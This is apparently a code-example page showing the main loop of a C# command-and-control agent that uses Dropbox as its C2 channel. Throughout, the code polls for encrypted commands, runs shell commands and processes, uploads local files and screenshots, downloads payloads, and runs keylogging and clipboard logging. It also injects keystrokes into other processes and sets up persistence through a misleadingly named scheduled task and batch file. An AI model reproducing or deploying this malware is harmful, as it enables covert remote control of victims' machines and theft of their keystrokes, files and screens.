コード例 #1
0
ファイル: dbc2_agent.cs プロジェクト: asdfasadfasfa/Albert
        //==================================================================================================
        // Main function
        //==================================================================================================
        private void Run()
        {
            // Get a unique ID for the machine this agent is running on
            agentID = createAgentID();
            mutex   = new Mutex(false, @"Global\" + agentID);

            // Check if another instance of an agent is already running
            if (!mutex.WaitOne(0, false))
            {
#if (DEBUG)
                Console.WriteLine("[ERROR] Another instance of the agent is already running");
#endif
                return;
            }

            //---------------------------------------------------------------------
#if (DEBUG)
            Console.WriteLine("------------ AGENT STARTING ------------");
#endif

            // Break flag used to exit the agent
            bool breakFlag = false;


            c2StatusFile = "/" + agentID + ".status";
            c2CmdFile    = "/" + agentID + ".cmd";

            // Initializing a DropboxHandler object to handle all communications with the Dropbox C2 server
            DropboxHandler dropboxHandler = new DropboxHandler(accessToken);

            #if (DEBUG)
            Console.WriteLine("[Main] Uploading status and command file to the C2 server");
            #endif

            // Create the c2StatusFile and c2CmdFile on the Dropbox server. These files act as an unique identifier for this agent
            // as well as a receiver for commands from the server
            c2CmdFileLastRevNumber    = dropboxHandler.putFile(c2CmdFile, Encoding.ASCII.GetBytes(""));
            c2StatusFileLastRevNumber = dropboxHandler.putFile(c2StatusFile, Encoding.ASCII.GetBytes(""));

            if (c2StatusFileLastRevNumber == String.Empty || c2CmdFileLastRevNumber == String.Empty)
            {
#if (DEBUG)
                Console.WriteLine("[Main][ERROR] Cannot create files on the C2 server");
#endif

                breakFlag = true;
            }
            else
            {
#if (DEBUG)
                Console.WriteLine("[Main] C2 Files created - Agent ready");
#endif
            }

            // Set initial sleep time to the nominal polling period with a deviation
            sleepTime = getRandomPeriod();

            //---------------------------------------------------------------------------------
            // Main loop
            //---------------------------------------------------------------------------------
            while (!breakFlag)
            {
#if (DEBUG)
                Console.WriteLine("[Main loop] Going to sleep for " + sleepTime / 1000 + " seconds");
#endif
                // Wait for the polling period to time out
                Thread.Sleep(sleepTime);
#if (DEBUG)
                Console.WriteLine("[Main loop] Waking up");
#endif

                // Calculate next sleep time
                sleepTime = getRandomPeriod();

                //----------------------------------------------------------------------------
                // Check if we're in shellMode
                if (shellMode)
                {
                    // So we're in shell mode, is there some shell output to push to the C2 ?
                    int currentLength = shellOutput.Length;
                    if (currentLength > 0)
                    {
                        string output = shellOutput.ToString(0, currentLength);
                        shellOutput.Remove(0, currentLength);
                        dropboxHandler.putFile("/" + agentID + ".dd", Crypto.EncryptData(Encoding.UTF8.GetBytes(output), cryptoKey));
                    }
                }

                //----------------------------------------------------------------------------
                // At each cycle, 'touch' the status file to show the agent is alive = beaconing
                c2StatusFileLastRevNumber = dropboxHandler.putFile(c2StatusFile, Encoding.ASCII.GetBytes("READY - " + DateTime.Now.ToString()));

                // Check the c2 command File revision number
                string revNumber = dropboxHandler.getRevNumber(c2CmdFile);
                if (revNumber == String.Empty)
                {
#if (DEBUG)
                    Console.WriteLine("[Main loop][ERROR] Unable to get the revision number for the command file");
#endif
                    // There was an error retrieving the last revision number, skip this turn
                    continue;
                }

                //----------------------------------------------------------------------------
                // If the revision number is different, that means there's a new command to be treated
                if (revNumber != c2CmdFileLastRevNumber)
                {
#if (DEBUG)
                    Console.WriteLine("[Main loop] Command file has a new revision number: [" + revNumber + "]");
#endif

                    c2CmdFileLastRevNumber = revNumber;

                    // Read the content of the C2 file
                    string content = Encoding.UTF8.GetString(Crypto.DecryptData(dropboxHandler.readFile(c2CmdFile), cryptoKey));
                    if (content == String.Empty)
                    {
#if (DEBUG)
                        Console.WriteLine("[Main loop][ERROR] C2 command file on the server seems empty...");
#endif
                        continue;
                    }

                    //---------------------------------------------------------------------------------------------------
                    // Parse the received command to extract all required fields
                    StringReader strReader      = new StringReader(content);
                    string       result         = String.Empty;
                    string       command        = strReader.ReadLine();
                    string       taskID         = strReader.ReadLine();
                    string       taskResultFile = "/" + agentID + "." + taskID;

#if (DEBUG)
                    Console.WriteLine("[Main loop] Command to execute: [" + command + "]");
#endif

                    //---------------------------------------------------------------------------------------------------
                    // Command routing
                    //---------------------------------------------------------------------------------------------------
                    switch (command)
                    {
                    case "shell":
                        string shellCommand = strReader.ReadLine();
                        shellMode = true;

#if (DEBUG)
                        Console.WriteLine("\t[shell] Executing: [" + shellCommand + "]");
#endif

                        // Send the command to the child process
                        runShell(shellCommand);
                        break;

                    case "runCLI":
                        string commandLine = strReader.ReadLine();

#if (DEBUG)
                        Console.WriteLine("\t[runCLI] Executing: [" + commandLine + "]");
#endif

                        // Execute the command
                        result = runCMD(commandLine);

                        if (result == null)
                        {
                            result = "ERROR - COULD NOT EXECUTE COMMAND:" + commandLine;
#if (DEBUG)
                            Console.WriteLine("\t[runCLI][ERROR] External command did not executed properly");
#endif
                        }

                        // Push the command result to the C2 server
                        dropboxHandler.putFile(taskResultFile, Crypto.EncryptData(Encoding.UTF8.GetBytes(result), cryptoKey));
                        break;

                    case "launchProcess":
                        string exeName   = strReader.ReadLine();
                        string arguments = strReader.ReadLine();

#if (DEBUG)
                        Console.WriteLine("\t[launchProcess] Executing: [" + exeName + " " + arguments + "]");
#endif

                        // Execute the command
                        if (launchProcess(exeName, arguments))
                        {
                            result = "OK - PROCESS STARTED: " + exeName + arguments;
                        }
                        else
                        {
                            result = "ERROR - COULD NOT EXECUTE: " + exeName + " " + arguments;
#if (DEBUG)
                            Console.WriteLine("\t[launchProcess][ERROR] External command did not executed properly");
#endif
                        }

                        // Push the command result to the C2 server
                        dropboxHandler.putFile(taskResultFile, Crypto.EncryptData(Encoding.ASCII.GetBytes(result), cryptoKey));
                        break;

                    case "sendFile":
                        string localFile  = strReader.ReadLine();
                        string remoteFile = taskResultFile + ".rsc";

#if (DEBUG)
                        Console.WriteLine("\t[sendFile] Uploading file [" + localFile + "] to [" + remoteFile + "]");
#endif

                        if (File.Exists(localFile))
                        {
                            // First push the wanted local file to the C2 server
                            dropboxHandler.putFile(remoteFile, Crypto.EncryptData(File.ReadAllBytes(localFile), cryptoKey));

#if (DEBUG)
                            Console.WriteLine("\t[sendFile] File uploaded");
#endif

                            // The task result is the path to the uploaded resource file
                            result = remoteFile;
                        }
                        else
                        {
                            // Push the command result to the C2 server
                            result = "ERROR - FILE NOT FOUND: " + localFile;
#if (DEBUG)
                            Console.WriteLine("\t[sendFile][ERROR] Command did not executed properly. Localfile not found : [" + localFile + "]");
#endif
                        }

                        // Push the command result to the C2 server
                        dropboxHandler.putFile(taskResultFile, Crypto.EncryptData(Encoding.ASCII.GetBytes(result), cryptoKey));
                        break;

                    case "downloadFile":
                        remoteFile = strReader.ReadLine();
                        string localPath = strReader.ReadLine();
                        string fileName  = strReader.ReadLine();

                        if (localPath == "temp")
                        {
                            localPath = Path.GetTempPath();
                        }

#if (DEBUG)
                        Console.WriteLine("\t[downloadFile] Downloading file from [" + remoteFile + "] to [" + localPath + fileName + "]");
#endif

                        if (dropboxHandler.downloadFile(remoteFile, localPath + fileName))
                        {
#if (DEBUG)
                            Console.WriteLine("\t[downloadFile] File downloaded");
#endif
                            result = "OK - FILE DOWNLOADED AT: " + localPath + fileName;
                        }
                        else
                        {
#if (DEBUG)
                            Console.WriteLine("\t[downloadFile][ERROR] Could not download file");
#endif
                            result = "ERROR - COULD NOT WRITE FILE AT LOCATION: " + localPath + fileName;
                        }

                        // remote file must be deleted
                        dropboxHandler.deleteFile(remoteFile);

                        // Push the command result to the C2 server
                        dropboxHandler.putFile(taskResultFile, Crypto.EncryptData(Encoding.ASCII.GetBytes(result), cryptoKey));
                        break;

                    case "sleep":
                        int    requestedSleepTime;
                        string value = strReader.ReadLine();
                        if (Int32.TryParse(value, out requestedSleepTime))
                        {
                            sleepTime = requestedSleepTime * 60 * 1000;

#if (DEBUG)
                            Console.WriteLine("\t[sleep] Next sleep is: " + sleepTime + " minute(s)");
#endif

                            // Compute wake up time
                            DateTime wakeUpTime = DateTime.Now.AddMinutes(sleepTime);
                            result = "SLEEPING" + "," + wakeUpTime.ToUniversalTime().ToString("yyyy-MM-ddTHH:mm:ssZ");

                            c2StatusFileLastRevNumber = dropboxHandler.putFile(c2StatusFile, Encoding.ASCII.GetBytes(result));
                        }
                        else
                        {
#if (DEBUG)
                            Console.WriteLine("\t[sleep][ERROR] Invalid amount of time specified [" + value + "]");
#endif
                            result = "ERROR - INVALID AMOUNT OF TIME FOR SLEEP: " + value;
                        }

                        // Push the command result to the C2 server
                        dropboxHandler.putFile(taskResultFile, Crypto.EncryptData(Encoding.ASCII.GetBytes(result), cryptoKey));
                        break;

                    case "polling":
                        int    requestedPeriod, requestDeviation;
                        string value1 = strReader.ReadLine();
                        string value2 = strReader.ReadLine();
                        if (Int32.TryParse(value1, out requestedPeriod) && Int32.TryParse(value2, out requestDeviation))
                        {
                            pollingPeriod = requestedPeriod * 1000;
                            deviation     = requestDeviation;

#if (DEBUG)
                            Console.WriteLine("\t[polling] Polling period changed to {0}s with a deviation of {1}% ", pollingPeriod, deviation);
#endif

                            result = "OK - PERIOD AND DEVIATION CHANGED";
                        }
                        else
                        {
#if (DEBUG)
                            Console.WriteLine("\t[polling][ERROR] Invalid value for period or deviation [{0}] / [{1}] of {1}% ", value1, value2);
#endif
                            result = "ERROR - INVALID INTEGER VALUE FOR PERIOD AND/OR DEVIATION: " + value1 + value2;
                        }

                        // Push the command result to the C2 server
                        dropboxHandler.putFile(taskResultFile, Crypto.EncryptData(Encoding.ASCII.GetBytes(result), cryptoKey));
                        break;

                    case "screenshot":
                        // Set the screenshot file name on the C2 server
                        remoteFile = taskResultFile + ".rsc";

#if (DEBUG)
                        Console.WriteLine("\t[screenshot] Taking screenshot and converting it to a JPG image");
#endif

                        // Push the image to the C2 server
                        dropboxHandler.putFile(remoteFile, Crypto.EncryptData(Screenshot.takeScreenShot(), cryptoKey));

                        // The task result is the path to the uploaded screenshot file
                        result = remoteFile;

#if (DEBUG)
                        Console.WriteLine("\t[screenshot] Uploading JPG screenshot to [" + remoteFile + "]");
#endif

                        // Push the command result to the C2 server
                        dropboxHandler.putFile(taskResultFile, Crypto.EncryptData(Encoding.ASCII.GetBytes(result), cryptoKey));
                        break;

                    case "keylogger":
                        string action = strReader.ReadLine();

                        if (action == "start")
                        {
                            keylogged = new StringBuilder();
                            // Start the keylogging function
                            KeyLogger.OnKeyDown += key => { keylogged.Append("d[" + key + "]\n"); };
                            KeyLogger.OnKeyUp   += key => { keylogged.Append("u[" + key + "]\n"); };
                            KeyLogger.Start();
#if (DEBUG)
                            Console.WriteLine("\t[keylogger] KeyLogger started");
#endif

                            result = "OK - KeyLogger started";
                        }
                        else
                        {
                            KeyLogger.Stop();
                            result = keylogged.ToString();
                            keylogged.Clear();
#if (DEBUG)
                            Console.WriteLine("\t[keylogger] KeyLogger stopped");
#endif
                        }

                        // Push the command result to the C2 server
                        dropboxHandler.putFile(taskResultFile, Crypto.EncryptData(Encoding.ASCII.GetBytes(result), cryptoKey));
                        break;

                    case "clipboardlogger":
                        action = strReader.ReadLine();

                        if (action == "start")
                        {
                            clipboardLogged = new StringBuilder();
                            // Start the keylogging function
                            ClipboardLogger.OnKeyBoardEvent += text => { clipboardLogged.Append(text + "\n"); };
                            ClipboardLogger.Start();
#if (DEBUG)
                            Console.WriteLine("\t[clipboardlogger] Clipboard Logger started");
#endif

                            result = "OK - Clipboard logger started";
                        }
                        else
                        {
                            ClipboardLogger.Stop();
                            result = clipboardLogged.ToString();
                            clipboardLogged.Clear();
#if (DEBUG)
                            Console.WriteLine("\t[clipboardlogger] Clipboard logger stopped");
#endif
                        }

                        // Push the command result to the C2 server
                        dropboxHandler.putFile(taskResultFile, Crypto.EncryptData(Encoding.ASCII.GetBytes(result), cryptoKey));
                        break;

                    case "sendkeystrokes":
                        string procName = strReader.ReadLine();
                        string keys     = strReader.ReadLine();

                        Process[] pList = Process.GetProcessesByName(procName);

                        if (pList.Length > 0)
                        {
                            Process p = pList[0];

#if (DEBUG)
                            Console.WriteLine("\t[sendkeystrokes] Sending key strokes to process " + procName + "\n" + keys);
#endif
                            if (KeyStrokes.sendKeyStrokes(p, keys))
                            {
                                result = "OK - Key strokes sent to process " + procName;
                            }
                            else
                            {
                                result = "ERROR - Could not send key strokes to the process, probably wrong keystrokes sequence";
                            }
                        }
                        else
                        {
#if (DEBUG)
                            Console.WriteLine("\t[sendkeystrokes] Error, could not find process with name " + procName);
#endif
                            result = "ERROR - Could not find a process with name " + procName;
                        }

                        // Push the command result to the C2 server
                        dropboxHandler.putFile(taskResultFile, Crypto.EncryptData(Encoding.ASCII.GetBytes(result), cryptoKey));
                        break;

                    case "persist":
                        // Get the current command line through which the stage was started, and
                        string oneLiner = Environment.CommandLine;
#if (DEBUG)
                        Console.WriteLine("\t[persist] Setting agent persistency through scheduled task");
#endif
                        // Create a fake/misleading batch script in the user's profile
                        string fileDir = Environment.ExpandEnvironmentVariables(@"%USERPROFILE%\AppData\Local\WindowsUserLogRotate");
                        Directory.CreateDirectory(fileDir);
                        string filePath = fileDir + @"\logrotate.bat";
                        System.IO.File.WriteAllText(filePath, oneLiner);

                        commandLine = "schtasks /create /TN 'WindowsUserLogRotate' /TR '" + filePath + "' /SC ONIDLE /i 20";
                        result      = runCMD(commandLine);

                        // Push the command result to the C2 server
                        dropboxHandler.putFile(taskResultFile, Crypto.EncryptData(Encoding.UTF8.GetBytes(result), cryptoKey));
                        break;

                    case "stop":
#if (DEBUG)
                        Console.WriteLine("\t[stop] Stopping agent");
#endif

                        result = "OK - STOPPING";
                        // Push the command result to the C2 server
                        dropboxHandler.putFile(taskResultFile, Crypto.EncryptData(Encoding.ASCII.GetBytes(result), cryptoKey));

                        breakFlag = true;
                        break;
                    }
                }
                else
                {
#if (DEBUG)
                    Console.WriteLine("[Main loop] revNumber [" + revNumber + "] hasn't changed, nothing to treat");
#endif
                }
            }
#if (DEBUG)
            Console.WriteLine("[Main] Exiting... ");
#endif
        }